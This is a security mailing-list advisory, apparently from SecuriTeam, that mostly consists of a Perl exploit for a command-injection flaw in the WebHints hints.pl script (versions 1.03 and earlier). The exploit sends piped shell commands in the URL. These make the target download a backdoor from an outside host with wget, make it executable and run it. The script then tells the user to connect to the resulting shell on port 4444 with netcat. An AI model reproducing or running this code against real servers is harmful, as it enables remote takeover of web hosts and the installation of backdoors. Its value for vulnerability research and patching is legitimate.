[EXPL] WebHints Remote Command Execution (Exploit, hints.pl)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

WebHints Remote Command Execution (Exploit, hints.pl)
------------------------------------------------------------------------

SUMMARY

" <http://awsd.com/scripts/webhints/index.shtml> WebHints allows you to
easily set up and maintain a 'Hint (Quote/Tip/Joke/Whatever) of the Day'
page. Addition of new entries is simple, and the script automatically
"turns over" the display the first time it is referenced each day"

The following exploit code will download and execute a backdoor of the
user's choice on a vulnerable WebHits product.

DETAILS

Vulnerable Systems:
* WebHints versions 1.03 and prior.

# This exploit uses a backdoor that isn't located on this server.
# $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";
# change for your own needs. /str0ke

#!/usr/bin/perl
###########################################
# T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m
#
###########################################
# EXPLOIT FOR: WebHints Remote C0mmand Execution Vuln
#
#
#
#Expl0it By: A l p h a _ P r o g r a m m e r (Sirus-v)
#
#Email: Alpha_Programmer@Yahoo.Com
#
#
#
#This Xpl Run a backdo0r in Server With 4444 Port.
#
###########################################
# GR33tz T0 => mh_p0rtal -- oil_Karchack -- The-CephaleX --
Str0ke #
#And Iranian Security & Technical Sites:
#
#
#
# TechnoTux.Com , IranTux.Com , Iranlinux.ORG , Barnamenevis.ORG
#
# Crouz , Simorgh-ev , IHSsecurity , AlphaST , Shabgard &
GrayHatz.NeT #
###########################################

use IO::Socket;

if (@ARGV < 2)
{
print "\n=======================\n";
print " \n WebHints Exploit By Alpha_Programmer \n\n";
print " Trap-Set Underground Hacking Team \n\n";
print " Usage: <T4rg3t> <Dir> \n\n";
print "=======================\n\n";
print "Examples:\n\n";
print " Webhints.pl www.Host.com /cgi-bin/ \n";
exit();
}

$serv = $ARGV[0];
$serv =~ s/http:\/\///ge;

$dir = $ARGV[1];

$cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";
$cmde2 = "cd /tmp;cp alpha.txt alpha.pl;chmod 777 alpha.pl;perl alpha.pl";

$req = "GET $dir";
$req .= "hints.pl?|$cmde| HTTP/1.0\n\n\n\n";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv",
PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n";

print $sock $req;
print "\nPlease Wait ...\n\n";
sleep(3000);
close($sock);

$sock2 = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv",
PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n";

$req2 = "GET $dir";
$req2 .= "hints.pl?|$cmde2| HTTP/1.0\n\n\n\n";

print $sock2 $req2;

sleep(100);

print "\n\n$$$ OK -- Now Try: Nc -v www.Site.com 4444 $$$\n";
print "$$ if This Port was Close , This mean is That , You Haven't
Permission to Write in /TMP $$\n";
print "Enjoy ;)";
## EOF ##

ADDITIONAL INFORMATION

The information has been provided by <mailto:Alpha Programmer>
Alpha_Programmer@Yahoo.Com.
The original article can be found at:
<http://www.securityfocus.com/archive/1/401940/30/0/threaded>
http://www.securityfocus.com/archive/1/401940/30/0/threaded

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.